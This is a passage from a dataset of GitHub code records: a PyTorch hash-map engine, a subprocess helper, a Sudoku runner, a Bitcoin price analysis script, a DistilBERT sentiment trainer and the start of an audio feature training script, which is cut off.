empty_space_module.forward(x)\n feat = feat_fg * mask_fg + feat_bg * (1 - mask_fg)\n\"\"\"\n\n\nclass ASHEngine(nn.Module):\n \"\"\"\n The core ASH engine. 
It maintains the minimal states of a hash map,\n namely a keys-indices map, associated with a heap.\n \"\"\"\n\n def __init__(\n self,\n dim: int,\n capacity: int,\n device: Union[str, torch.device] = torch.device(\"cpu\"),\n ):\n \"\"\"Init ASH engine.\n Args:\n dim: dimension of the keys\n capacity: maximum number of items in the hash map\n device: device to store the states\n \"\"\"\n super().__init__()\n assert dim > 0, \"dim must be positive\"\n self.dim = dim\n\n assert capacity > 0, \"capacity must be positive\"\n self.capacity = capacity\n\n self.device = isinstance(device, str) and torch.device(device) or device\n\n self._register_buffers()\n self.backend = backend.HashMap(self.dim, self.capacity, self._heap, self.device)\n\n def _register_buffers(self) -> None:\n \"\"\"Register buffers for state_dict save and load.\"\"\"\n\n self.register_buffer(\n \"_heap\", torch.arange(self.capacity, dtype=torch.int32, device=self.device)\n )\n\n # DO NOT ACCESS: keys and indices are reserved for state_dict save and load.\n self.register_buffer(\n \"_keys\",\n torch.zeros(\n (self.capacity, self.dim), dtype=torch.int32, device=self.device\n ),\n )\n self.register_buffer(\n \"_indices\",\n torch.zeros(self.capacity, dtype=torch.long, device=self.device),\n )\n self.register_buffer(\n \"_size\", torch.zeros(1, dtype=torch.int32, device=self.device)\n )\n self.register_load_state_dict_post_hook(self._post_load_state_dict_hook)\n\n def state_dict(\n self, destination=None, prefix: str = \"\", keep_vars: bool = False\n ) -> \"OrderedDict[str, torch.Tensor]\":\n \"\"\"Override state_dict to obtain active keys and indices into the backend.\n Args:\n destination: see torch.nn.Module.state_dict\n prefix: see torch.nn.Module.state_dict\n keep_vars: see torch.nn.Module.state_dict\n Returns:\n state_dict: state_dict with size, heap, active keys, and indices\n to reproduce the hash map.\n \"\"\"\n state_dict = super().state_dict(destination, prefix, keep_vars)\n\n active_keys, active_indices = self.items()\n size = self.backend.size()\n\n self._size[:] = size\n if size > 0:\n self._keys[:size] = active_keys\n self._indices[:size] = active_indices\n\n return state_dict\n\n def _post_load_state_dict_hook(self, module, incompatible_keys) -> None:\n \"\"\"hook to load active keys and indices into the backend.\n Args:\n module: see torch.nn.Module.state_dict\n incompatible_keys: see torch.nn.Module.state_dict\n \"\"\"\n backend_state_keys = [\"_keys\", \"_indices\", \"_size\"]\n\n size = self._size.item()\n\n backend_state_dict = {\n \"active_keys\": self._keys[:size],\n \"active_indices\": self._indices[:size],\n \"heap\": self._heap,\n }\n\n assert len(self._heap) == self.capacity\n self._key_check(backend_state_dict[\"active_keys\"])\n\n self.backend.load_states(backend_state_dict)\n\n def _key_check(self, keys: torch.Tensor) -> None:\n \"\"\"Check keys shape and dtype.\n Args:\n keys: keys to check for insert, find, erase\n \"\"\"\n assert len(keys.shape) == 2 and keys.shape[1] == self.dim, \"keys shape mismatch\"\n\n if keys.dtype != torch.int32:\n warnings.warn(\"keys are not int32, conversion might reduce precision.\")\n\n def _value_check(\n self, values: Dict[str, torch.Tensor], external_values: Dict[str, torch.Tensor]\n ) -> None:\n \"\"\"Check values shape and dtype.\n Check if insertions and external_values are consistent.\n Args:\n values: values to check for insert\n external_values: external values, usually maintained by the user as the values or embeddings\n \"\"\"\n assert values.keys() == 
external_values.keys()\n for k, v in values.items():\n assert k in external_values\n\n assert v.is_contiguous()\n assert external_values[k].is_contiguous()\n\n assert v.ndim == external_values[k].ndim\n assert v.dtype == external_values[k].dtype\n assert v.shape[1:] == external_values[k].shape[1:]\n assert self.capacity == external_values[k].shape[0]\n\n def find(self, keys: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Find indices of keys in the hash map.\n Args:\n keys: (N, dim)\n Returns:\n indices: (N,) indices of found keys in the hash map, can be associated with maintained values\n masks: (N,) masks of whether keys are in the hash map\n \"\"\"\n self._key_check(keys)\n\n if len(keys) == 0:\n warnings.warn(\"empty keys\")\n return (\n torch.empty((0,), dtype=torch.long, device=self.device),\n torch.empty((0,), dtype=torch.bool, device=self.device),\n )\n\n keys = keys.to(self.device, torch.int32).contiguous()\n indices, masks = self.backend.find(keys)\n return indices, masks\n\n def insert_keys(self, keys: torch.Tensor) -> None:\n \"\"\"Insert keys into the hash map without specifying values.\n Args:\n keys: (N, dim)\n \"\"\"\n # TODO(wei): add safe and unsafe options\n self._key_check(keys)\n\n if len(keys) == 0:\n warnings.warn(\"empty keys\")\n return\n\n keys = keys.to(self.device, torch.int32).contiguous()\n\n prev_size = self.size()\n self.backend.insert_keys(keys)\n curr_size = self.size()\n if len(keys) + prev_size > self.capacity and curr_size > self.capacity:\n warnings.warn(\n f\"Insertion of {len(keys)} increased the hash map size from {prev_size} \"\n f\"to {curr_size}, which exceeds the hash map capacity {self.capacity}. \"\n \"Please resize the hash map or the behavior could be unexpected.\"\n )\n\n def insert(\n self,\n keys: torch.Tensor,\n values: Dict[str, torch.Tensor],\n external_values: Dict[str, torch.Tensor],\n ) -> None:\n \"\"\"Insert keys and values into the hash map.\n Args:\n keys: (N, dim)\n values: dict of values to insert, e.g. {\"value\": (N, dim)}\n external_values: dict of external values, usually maintained by the user as the values or embeddings\n \"\"\"\n self._key_check(keys)\n\n if len(keys) == 0:\n warnings.warn(\"empty keys\")\n return\n\n self._value_check(values, external_values)\n for k, v in values.items():\n assert v.shape[0] == len(keys)\n keys = keys.to(self.device, torch.int32).contiguous()\n\n prev_size = self.size()\n self.backend.insert(keys, values, external_values)\n curr_size = self.size()\n if len(keys) + prev_size > self.capacity and curr_size > self.capacity:\n warnings.warn(\n f\"Insertion of {len(keys)} increased the hash map size from {prev_size} \"\n f\"to {curr_size}, which exceeds the hash map capacity {self.capacity}. 
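The save/load scheme in the core.py record relies on two PyTorch facilities it uses explicitly: register_buffer, which puts non-parameter tensors into state_dict, and register_load_state_dict_post_hook, which runs after those tensors are restored so the module can rebuild its backend. A self-contained sketch of the pattern:

import torch
import torch.nn as nn

class Counter(nn.Module):
    def __init__(self):
        super().__init__()
        # Buffers travel with state_dict even though they are not trained.
        self.register_buffer('count', torch.zeros(1, dtype=torch.long))
        self.register_load_state_dict_post_hook(self._after_load)

    @staticmethod
    def _after_load(module, incompatible_keys):
        # Runs once the buffers are restored -- the point where ASHEngine
        # pushes the saved keys back into its hash-map backend.
        print('restored count:', int(module.count))

src = Counter()
src.count += 3
dst = Counter()
dst.load_state_dict(src.state_dict())  # prints: restored count: 3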
\"\n \"Please resize the hash map or the behavior could be unexpected.\"\n )\n\n def erase(self, keys: torch.Tensor) -> None:\n \"\"\"Erase keys from the hash map.\n Args:\n keys: (N, dim)\n \"\"\"\n self._key_check(keys)\n if len(keys) == 0:\n warnings.warn(\"empty keys\")\n return\n\n self.backend.erase(keys)\n\n def clear(self) -> None:\n \"\"\"Clear the hash map.\"\"\"\n self.backend.clear()\n\n def size(self) -> int:\n \"\"\"Return the current size of the hash map.\"\"\"\n return self.backend.size()\n\n def resize(\n self,\n capacity: int,\n old_external_values: Dict[str, torch.Tensor] = None,\n new_external_values: Dict[str, torch.Tensor] = None,\n ) -> None:\n \"\"\"Resize the hash map to a new capacity.\n Args:\n capacity: new capacity\n old_external_values: dict of external values or embeddings before resizing\n new_external_values: dict of external values or embeddings after resizing\n \"\"\"\n assert capacity >= self.size(), \"new capacity is smaller than the current size\"\n assert capacity > 0, \"new capacity is 0\"\n\n active_keys, old_indices = self.items()\n size = self.backend.size()\n del self.backend\n\n self.capacity = capacity\n\n self._register_buffers()\n self.backend = backend.HashMap(self.dim, self.capacity, self._heap, self.device)\n\n if size == 0:\n return\n\n if old_external_values is not None and new_external_values is not None:\n active_old_external_values = {}\n for k, v in old_external_values.items():\n active_old_external_values[k] = v[old_indices]\n\n self.backend.insert(\n active_keys, active_old_external_values, new_external_values\n )\n else:\n self.backend.insert_keys(active_keys)\n\n def keys(self) -> torch.Tensor:\n \"\"\"Return all active keys in the hash map.\"\"\"\n active_keys, active_indices = self.items()\n return active_keys\n\n def items(self) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Return all active keys and indices to external values in the hash map.\n Returns:\n active_keys: (N, dim)\n active_indices: (N,)\n \"\"\"\n size = self.backend.size()\n if size == 0:\n return (\n torch.empty((0, self.dim), dtype=torch.int32, device=self.device),\n torch.empty((0,), dtype=torch.long, device=self.device),\n )\n active_keys, active_indices = self.backend.items()\n return active_keys, active_indices\n\n # TODO(wei): implement cpu engine and enable to and from\n def to(self, device: Union[str, torch.device]):\n device = torch.device(device) if isinstance(device, str) else device\n new_engine = ASHEngine(self.dim, self.capacity, device)\n\n return new_engine\n\n def cpu(self):\n return self.to(\"cpu\")\n\n def cuda(self, device: Optional[Union[str, torch.device]] = None):\n if device is None:\n return self.to(\"cuda\")\n return self.to(device)\n\n def __repr__(self) -> str:\n name = \"ASHEngine (dim={}, capacity={}, size={}) at {}\".format(\n self.dim,\n self.capacity,\n self.size(),\n self.device,\n )\n return name\n\n\nclass ASHModule(nn.Module):\n \"\"\"\n Helper virtual class to handle engine's 'to' operations\n Inherited by HashEmbedding, HashMap, and HashSet\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.engine = None\n\n def to(self, device):\n assert self.engine is not None, \"engine is not initialized\"\n module = super(ASHModule, self).to(device)\n module.engine = module.engine.to(device)\n return module\n\n def cpu(self):\n return self.to(torch.device(\"cpu\"))\n\n def cuda(self, device: Optional[Union[str, torch.device]] = None):\n if device is None:\n return self.to(torch.device(\"cuda\"))\n return 
self.to(device)\n","repo_name":"theNded/torch-ash","sub_path":"ash/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":12835,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"40"} +{"seq_id":"26470502068","text":"#! /usr/bin/env python\n# -*-- coding: utf-8 -*-\n\nimport copy\nimport json\nimport os\nimport subprocess\n\nfrom ti_server.common.log import logger as log\nfrom ti_server.common.path_constant import PathConstant\n\n\nclass BaseFun(object):\n\n @staticmethod\n def __pre_func():\n os.umask(0)\n\n @staticmethod\n def exe_cmd(cmd, pid=False):\n pro = subprocess.Popen(\n args=cmd, shell=True, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, cwd=PathConstant.SUBPROCESS_ROOT,\n preexec_fn=BaseFun.__pre_func, close_fds=True\n )\n output = pro.communicate()\n code = pro.returncode\n if not pid:\n return code, output\n return pro.pid, code, output\n\n @staticmethod\n def exe_cmd_demon(cmd):\n subprocess.Popen(\n args=cmd, shell=True\n )\n\n @staticmethod\n def com_read_file_with_json(file_name, mode=\"r\", **kwargs):\n if not os.path.exists(file_name):\n log.warning('File <%s> not exist.' % file_name)\n if \"default\" in kwargs:\n return kwargs[\"default\"]\n raise IOError(\"No such file or directory: %s\" % file_name)\n\n with open(file_name, mode) as fp:\n json_body = json.load(fp)\n return json_body\n\n @staticmethod\n def com_write_file_with_json(file_name, json_body, mode=\"w+\"):\n body = copy.deepcopy(json_body)\n with open(file_name, mode) as fp:\n fp.write(json.dumps(body))\n log.info('Save file <%s> success.' % file_name)\n","repo_name":"qwasxj/ti_server","sub_path":"ti_server/common/ti_base_func.py","file_name":"ti_base_func.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20387325399","text":"from Sudoku import Sudoku\nfrom grids import grids\nfrom flag_identifier import input_collection\nfrom file_input import file_input_main\nimport sys\nimport numpy as np\nfrom profile_docs import profile_grids\n\ndef main():\n\n # Check if the input is valid - only contains valid flags and arguments\n try:\n flag_dict, flag_value = input_collection(sys.argv[1:])\n\n # If not, print the error and exit\n except ValueError as e:\n print(\"Error: \",e)\n sys.exit()\n\n # If the file flag is enabled, run the file input function and exit\n if flag_dict['-file'] == True:\n # Run seperate file input function and exit\n file_input_main(flag_value['-file'][0], flag_value['-file'][1], flag_dict['-hint'], flag_value['-hint'],flag_dict['-explain'], flag_dict['-profile'])\n return \n \n ##### IF THERE IS NO FILE INPUT #####\n # The grids from grids.py are run automatically\n\n # Initialise the grid storage dictionary to store the Sudoku class instances\n grid_storage = {}\n # Initialise the solve metrics dictionary to store the profiling metrics if profiling is enabled\n if flag_dict['-profile'] == True:\n solve_metrics = {}\n\n # Iterate through the grids and initialise the Sudoku class for each grid, storing the instance in the grid storage dictionary\n for index, grid in enumerate(grids):\n idx = int(index) + 1\n grid_storage[ f'Grid {idx}'] = Sudoku(grid = grid[0], \n n_rows = grid[1], \n n_cols = grid[2], \n hint_flag = flag_dict['-hint'], \n hint_number = flag_value['-hint'], \n profile_flag= flag_dict['-profile'],\n explain_flag= flag_dict['-explain'])\n \n\n # Iterate through the grid storage dictionary and solve each grid using 
the wavefront and recursion methods\n for instance in grid_storage:\n\n # Solve the grid\n grid_storage[instance].wavefront_solve()\n grid_storage[instance].recursion_solve()\n output_grid = grid_storage[instance].grid\n\n\n # If the hint flag is enabled, generate the hint grid and return it\n if flag_dict['-hint'] == True:\n grid_storage[instance].hint_class()\n # output grid (grid to be printed) is reasigned to the hint grid\n output_grid = grid_storage[instance].hint_grid\n # This is just a little printed message outside of the explain method so\n # There is a little explanation of what the hint grid is\n if flag_dict['-explain'] == False:\n print('Hint Grid')\n print(f'({flag_value[\"-hint\"]} hints requested)')\n \n # Print the appropriate grid\n print(instance)\n print(np.array(output_grid))\n\n\n\n # If the profile flag is enabled, run the profiling method, storing the metrics in the solve metrics dictionary\n if flag_dict['-profile'] == True:\n print('\\nRunning profiling simulations...\\n')\n grid_storage[instance].profile()\n\n solve_metrics[instance] = [(grid_storage[instance].n_rows, grid_storage[instance].n_cols), \n (grid_storage[instance].avg_time_recursion, grid_storage[instance].avg_time_wavefront, grid_storage[instance].avg_time_overall), \n grid_storage[instance].zero_counter]\n \n # If the explain flag is enabled, print the explanation of the solution (either hints or full solution)\n if flag_dict['-explain'] == True:\n grid_storage[instance].explain_class()\n \n # If the profile flag is enabled, print the profiling metrics (plots)\n if flag_dict['-profile'] == True:\n profile_grids(solve_metrics) \n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"pilipb/further-cp-cw3-g32","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4012,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"445413903","text":"\n# coding: utf-8\n#Omar Isaias Flores Galicia\n#18.01.2018\n\n\n#Main Libs\nimport os\nimport sys\nimport traceback\nimport pandas as pd\nimport json\nimport requests\nfrom requests import exceptions\nfrom datetime import datetime, timedelta\n\n\n#CONSTANT VARIABLES\nAPI_URL_BASE = 'https://www.alphavantage.co/query'\nFUNCTION_TOKEN = 'DIGITAL_CURRENCY_DAILY'\nSYMBOL_TOKEN = 'BTC'\nMARKET_TOKEN = 'USD'\nASC_ORDER = True\nDESC_ORDER = False\nERROR_TAG_JSON_PROP = 'Error Message'\nPATH_TO_STORE = 'temp_records'\nheaders = {'Content-Type': 'application/json'}\nFILE_DATA_COLUMNS = [\"timestamp\",\n \"1a. open (USD)\",\n \"1b. open (USD)\",\n \"2a. high (USD)\",\n \"2b. high (USD)\",\n \"3a. low (USD)\",\n \"3b. low (USD)\",\n \"4a. close (USD)\",\n \"4b. close (USD)\",\n \"5. volume\",\n \"6. market cap (USD)\"]\n\n#Function that request information from the API in JSON format\ndef get_data_from_api(api_token):\n try:\n payload = {'function':FUNCTION_TOKEN, 'symbol':SYMBOL_TOKEN, 'market':MARKET_TOKEN,'apikey':api_token}\n response = requests.get(API_URL_BASE,params=payload)\n\n if response.status_code >= 500:\n print('[!] [{0}] Server Error'.format(response.status_code))\n return None\n elif response.status_code == 404:\n print('[!] [{0}] URL not found: [{1}]'.format(response.status_code,api_url))\n return None\n elif response.status_code == 401:\n print('[!] [{0}] Authentication Failed'.format(response.status_code))\n return None\n elif response.status_code == 400:\n print('[!] 
[{0}] Bad Request'.format(response.status_code))\n return None\n elif response.status_code >= 300:\n print('[!] [{0}] Unexpected Redirect'.format(response.status_code))\n return None\n elif response.status_code == 200:\n print('URL API {0}'.format(response.url))\n json_data = json.loads(response.content.decode('utf-8'))\n return json_data\n else:\n print('[?] Unexpected Error: [HTTP {0}]: Content: {1}'.format(response.status_code, response.content))\n except exceptions.ConnectionError as e:\n print('[?] Connection Error: Check out internet connection or port access {0}'.format(e))\n response = 'No response'\n return None\n except ValueError:\n print('[?] Unexpected Error: [HTTP {0}]: Content: {1}'.format(response.status_code, response.content))\n return None\n return None\n\n#Function that converts the JSON object on Pandas DataFrame\n#Params: json_data = JSON object with data,\n# sort_asc_desc = True for ascending or False for descending sorting\n\ndef get_dataframe_from_json(json_data,sort_asc_desc):\n TIME_SERIES_API_TAG = 'Time Series (Digital Currency Daily)'\n JSON_OBJECT_COLUMNS = [\"1a. open (USD)\",\n \"1b. open (USD)\",\n \"2a. high (USD)\",\n \"2b. high (USD)\",\n \"3a. low (USD)\",\n \"3b. low (USD)\",\n \"4a. close (USD)\",\n \"4b. close (USD)\",\n \"5. volume\",\n \"6. market cap (USD)\"]\n\n time_series_json_data = json_data[TIME_SERIES_API_TAG]\n daily_crypto_records_list = [];\n\n for timestamp_cryptocurrency in time_series_json_data:\n selected_row = []\n selected_row.append(pd.to_datetime(timestamp_cryptocurrency))\n for item in JSON_OBJECT_COLUMNS:\n selected_row.append(float(time_series_json_data[timestamp_cryptocurrency][item]))\n daily_crypto_records_list.append(selected_row)\n\n daily_crypto_dataframe = pd.DataFrame(data=daily_crypto_records_list,columns=FILE_DATA_COLUMNS).sort_values([FILE_DATA_COLUMNS[0]],ascending=sort_asc_desc)\n\n return daily_crypto_dataframe\n\n#Save a dataframe to CSV file\n#Params: filename = name of the file, path = place to stare the file,\n# df_crypto_prices = pandas dataframe, index_flag = True to store indexs or False to not save index\ndef save_dataframe_to_csv(filename,path,df_crypto_prices,index_flag):\n try:\n timestamp_for_file = int((datetime.now() - datetime.utcfromtimestamp(0)).total_seconds())\n file_name_crypto_csv = '{0}/{1}_{2}.csv'.format(path,filename,timestamp_for_file)\n df_crypto_prices.to_csv(file_name_crypto_csv,encoding='utf-8',index=index_flag)\n except Exception as e:\n print(\"[?] Error: creating the file {0} {1}. More information {2}\".format(filename,path,e) )\n return False\n return file_name_crypto_csv\n\n#Function which is used in lambda function to compute relative_span per each week data\ndef relative_span_calc(cols):\n return ((cols['close_weekly_max_price']-cols['close_weekly_min_price'])/cols['close_weekly_min_price'])\n\n#Add timestamp from dataset as an index and drop unused columns\n#Params: df_daily_crypto = pandas dataframe with dayly close price values.\ndef get_dataFrame_transformed(df_daily_crypto):\n df_daily_crypto['date_time_index'] = df_daily_crypto[\"timestamp\"].apply( lambda df_daily_crypto : datetime(year=df_daily_crypto.year, month=df_daily_crypto.month, day=df_daily_crypto.day))\n df_daily_crypto.set_index(df_daily_crypto[\"date_time_index\"],inplace=True)\n return df_daily_crypto\n\n#Function which get weekly average and returns a dataframe with:\n# DatetimeIndex and the close weekly caluclations taking\n# as a base '4a. 
close (USD)' (value from the data API) values\n#Params: df_daily_crypto = pandas dataframe\ndef get_weekly_average_dataFrame(df_daily_crypto):\n df_daily_crypto = df_daily_crypto['4a. close (USD)'].astype('float')\n df_weekly_close_value = pd.Series.to_frame(df_daily_crypto.resample('W').mean())\n df_weekly_close_value.columns = ['close_weekly_average_price']\n return df_weekly_close_value\n\n#Computes the relative_span for all the data contained in the DataFrame And\n#Prints the week with the highest relative_span\ndef compute_relative_span_from_dataframe(df_daily_crypto):\n df_weekly_close_minmax = pd.Series.to_frame(df_daily_crypto.resample('W').max())\n df_weekly_close_minmax.columns = ['close_weekly_max_price']\n df_weekly_close_value_min = pd.Series.to_frame(df_daily_crypto.resample('W').min())\n df_weekly_close_value_min.columns = ['close_weekly_min_price']\n df_weekly_close_minmax['close_weekly_min_price'] = df_weekly_close_value_min['close_weekly_min_price']\n df_weekly_close_minmax.index = pd.to_datetime(df_weekly_close_minmax.index, unit='s')\n df_weekly_close_minmax['relative_span'] = df_weekly_close_minmax[['close_weekly_max_price','close_weekly_min_price']].apply(relative_span_calc,axis=1)\n week_datetime = df_weekly_close_minmax['relative_span'].idxmax()\n week_datetime = '{0}-{1}-{2}'.format(week_datetime.year,week_datetime.month,week_datetime.day)\n print('The week that finalized in \\'{0}\\' has the greates relative_span = {1}.'.format(week_datetime,df_weekly_close_minmax['relative_span'].max()))\n return None\n\n#Main function to call\n#Calculates Weekly average and save on disk.\n#And Calculates relative span for each week and prints the highest week with relative span in the dataset.\ndef compute_statistics_from_dataset():\n\n try:\n api_key = os.environ['API_KEY']\n dir_name = os.environ['FOLDER_NAME']\n\n json_data = get_data_from_api(api_key)\n\n\n if (len(json_data) > 1) and (json_data.get(ERROR_TAG_JSON_PROP) is None) :\n crypto_daily_dataframe = get_dataframe_from_json(json_data,ASC_ORDER)\n #Save file with the daily records in a CSV file\n filename = '{0}_{1}_{2}'.format(FUNCTION_TOKEN,SYMBOL_TOKEN,MARKET_TOKEN)\n is_created = save_dataframe_to_csv(filename,dir_name,crypto_daily_dataframe,False)\n\n if is_created is not False:\n print('{0} file has been created'.format(is_created))\n\n crypto_daily_dataframe = get_dataFrame_transformed(crypto_daily_dataframe)\n df_weekly_close_value = get_weekly_average_dataFrame(crypto_daily_dataframe)\n filename = 'WEEKLY_AVERAGE_PRICE_{0}_{1}'.format(SYMBOL_TOKEN,MARKET_TOKEN)\n is_created = save_dataframe_to_csv(filename,dir_name,df_weekly_close_value,True)\n\n if is_created is not False:\n print('{0} file has been created'.format(is_created))\n\n crypto_daily_dataframe = crypto_daily_dataframe['4a. close (USD)'].astype('float')\n compute_relative_span_from_dataframe(crypto_daily_dataframe)\n else:\n print('[?] get_data_from_api - Unexpected Error querying the API, error message: {0}'.format(json_data[ERROR_TAG_JSON_PROP]))\n except TypeError as e:\n tracing_error_module = traceback.format_exc()\n print('[?] Unexpected Error: \\n {0}'.format(tracing_error_module))\n except KeyError:\n print('[?] 
Enviroment Error: Be sure you are adding correctly the API_KEY and FILE_NAME variables.')\n\nprint(\"Computing calculations in the crypto dataset...\")\ncompute_statistics_from_dataset()\n","repo_name":"OmarFlores/assignment_2018","sub_path":"scripts/crypto_analysis.py","file_name":"crypto_analysis.py","file_ext":"py","file_size_in_byte":9198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28359559885","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport tensorflow as tf\nfrom transformers import TFAutoModelForSequenceClassification, AutoTokenizer\nfrom typing import Tuple\nimport zipfile\nimport os\n\nPRETRAINED_MODEL_NAME: str = \"distilbert-base-uncased\"\nTRAINING_DATASET_PATH: str = \"data/rotten_tomatoes_critic_reviews.csv\"\nMODEL_OUTPUT_PATH: str = \"./tuned_model\"\nEPOCHS: int = 3\nDATASET_ROWS_LIMIT: int = 100000\nRANDOM_STATE: int = 42\n\n\ndef load_dataset(file_path: str) -> pd.DataFrame:\n if not os.path.exists(file_path):\n zip_path = file_path + \".zip\"\n with zipfile.ZipFile(zip_path) as zip_file:\n zip_file.extractall(\"./data\")\n\n df = pd.read_csv(file_path)\n df = df[[\"review_content\", \"review_score\"]]\n df = df.dropna(subset=[\"review_content\", \"review_score\"])\n return df.sample(DATASET_ROWS_LIMIT, random_state=RANDOM_STATE)\n\n\ndef preprocess_dataset(df: pd.DataFrame, tokenizer: AutoTokenizer) -> Tuple[dict, list]:\n score_pattern = r\"^\\d+(\\.\\d+)?/\\d+(\\.\\d+)?$\"\n df = df[df[\"review_score\"].str.match(score_pattern)]\n normalized_scores = df[\"review_score\"].apply(\n lambda x: float(x.split(\"/\")[0]) / float(x.split(\"/\")[1])\n if float(x.split(\"/\")[1]) != 0\n else 0.0\n )\n\n inputs = tokenizer(\n df[\"review_content\"].tolist(),\n truncation=True,\n padding=True,\n max_length=256,\n add_special_tokens=True,\n return_attention_mask=True,\n )\n labels = normalized_scores.apply(\n lambda x: 2 if x > 0.6 else (1 if 0.5 <= x <= 0.6 else 0)\n )\n return inputs, labels\n\n\ndef split_dataset(inputs: dict, labels: list) -> Tuple:\n (\n train_inputs,\n test_inputs,\n train_mask,\n test_mask,\n train_labels,\n test_labels,\n ) = train_test_split(\n inputs[\"input_ids\"],\n inputs[\"attention_mask\"],\n labels,\n test_size=0.3,\n random_state=RANDOM_STATE,\n )\n\n train_dataset = tf.data.Dataset.from_tensor_slices(\n (\n dict(input_ids=train_inputs, attention_mask=train_mask),\n train_labels,\n )\n )\n test_dataset = tf.data.Dataset.from_tensor_slices(\n (\n dict(input_ids=test_inputs, attention_mask=test_mask),\n test_labels,\n )\n )\n\n return train_dataset, test_dataset\n\n\ndef train_model(\n train_dataset: tf.data.Dataset,\n test_dataset: tf.data.Dataset,\n) -> TFAutoModelForSequenceClassification:\n model = TFAutoModelForSequenceClassification.from_pretrained(\n PRETRAINED_MODEL_NAME, num_labels=3, dropout=0.3, attention_dropout=0.3\n )\n batch_size = 32\n optimizer = tf.keras.optimizers.Adam(learning_rate=2e-5, weight_decay=0.01)\n loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True)\n metrics = [\"accuracy\"]\n early_stopping_callback = tf.keras.callbacks.EarlyStopping(\n monitor=\"val_loss\", patience=2, restore_best_weights=True\n )\n\n model.compile(optimizer=optimizer, loss=loss, metrics=metrics)\n model.fit(\n train_dataset.shuffle(1000).batch(batch_size),\n epochs=EPOCHS,\n batch_size=batch_size,\n validation_data=test_dataset.batch(batch_size),\n callbacks=[early_stopping_callback],\n )\n return model\n\n\ndef main():\n 
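compute_relative_span_from_dataframe in the crypto_analysis.py record above resamples the daily closes to weeks separately for max and min; a single .agg call yields both in one pass. A minimal sketch on synthetic prices (the values are illustrative, not market data):

import numpy as np
import pandas as pd

idx = pd.date_range('2021-01-01', periods=21, freq='D')
close = pd.Series(np.linspace(100.0, 160.0, 21), index=idx)

weekly = close.resample('W').agg(['min', 'max'])
weekly['relative_span'] = (weekly['max'] - weekly['min']) / weekly['min']
print(weekly['relative_span'].idxmax(), weekly['relative_span'].max())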
tokenizer = AutoTokenizer.from_pretrained(PRETRAINED_MODEL_NAME)\n\n df: pd.DataFrame = load_dataset(TRAINING_DATASET_PATH)\n inputs, labels = preprocess_dataset(df, tokenizer)\n train_dataset, test_dataset = split_dataset(inputs, labels)\n\n model = train_model(train_dataset, test_dataset)\n model.save_pretrained(MODEL_OUTPUT_PATH)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"oscargullberg/movie-reviews-distilbert-sentiment-analysis","sub_path":"src/sentiment_analysis/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9900817550","text":"\"\"\"2 functions which calculate given input when called\r\nDudley Mutero\r\n13-4-14\"\"\"\r\n\r\ndef get_integer(text):\r\n #prompts user to input the 1st and second values of their permutations\r\n print(\"Enter \",text,\":\",sep=\"\")\r\n val=input()\r\n while not val.isdigit ():\r\n print (\"Enter \",text,\":\", sep=\"\")\r\n val=input()\r\n return eval (val)\r\n\r\n \r\ndef calc_factorial(text2):\r\n #calculates the factorial of given input\r\n nfactorial = 1\r\n for i in range (1, text2+1):\r\n nfactorial *= i \r\n return nfactorial\r\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_5/mtrdud001/mymath.py","file_name":"mymath.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39871775349","text":"\"\"\"Performs training and testing of a neural network.\nTakes at the input audio features extracted from voice cleared audio\nFor dataset preparation use gen_audio_features.py script\"\"\"\n\n#region Imports\nimport datetime\nimport random\nimport argparse\nimport math\nfrom os.path import join, isdir, isfile\nfrom os import makedirs\nimport numpy as np\nimport tensorflow as tf\nimport keras\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, CuDNNLSTM, Dropout, Reshape, TimeDistributed\nfrom keras.utils import to_categorical, multi_gpu_model\nfrom keras.callbacks import EarlyStopping\nfrom sklearn.model_selection import train_test_split, RepeatedStratifiedKFold\nfrom feature_extractor import FeatureExtractor\nfrom progress_bar import print_progress_bar\n#endregion\n\n\ndef compose_samples_with_timesteps(raw_features, num_timesteps, overlap_coeff=0.75):\n num_coeffs = raw_features.shape[1]\n num_windows = raw_features.shape[0]\n num_overlapped_timesteps = math.floor(num_timesteps*overlap_coeff)\n num_samples = math.floor(num_windows/num_overlapped_timesteps)\n # For simplicity Skip the last sample for the case\n # if num_windows is not divisible by num_samples\n if num_samples:\n num_samples -= 1\n timestep_samples = np.zeros((num_samples, num_timesteps, num_coeffs))\n for idx in range(num_samples):\n sample_start = idx*num_overlapped_timesteps\n sample_end = sample_start + num_timesteps\n timestep_samples[idx] = raw_features[sample_start:sample_end]\n return timestep_samples\n\n\ndef load_feature_from_file(path, num_timesteps):\n features_all = np.load(path)\n timestep_samples = compose_samples_with_timesteps(features_all, num_timesteps)\n return timestep_samples\n\n\ndef load_voxceleb_features(dataset_dir, list_path, num_timesteps, debug_mode):\n debug_break_number = 1000\n\n print('Started loading features from files...')\n time_start = datetime.datetime.now()\n\n f = open(list_path)\n f_list = list(f)\n f.close()\n\n features = []\n labels = []\n 
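compose_samples_with_timesteps in the model_train_test.py record above cuts a (frames, coeffs) feature matrix into fixed-width windows whose start points advance by floor(num_timesteps * overlap_coeff) frames. A minimal numpy sketch of that overlapped slicing:

import numpy as np

def windows(x, width, hop):
    # Start indices 0, hop, 2*hop, ... for as long as a full window fits.
    starts = range(0, len(x) - width + 1, hop)
    return np.stack([x[s:s + width] for s in starts])

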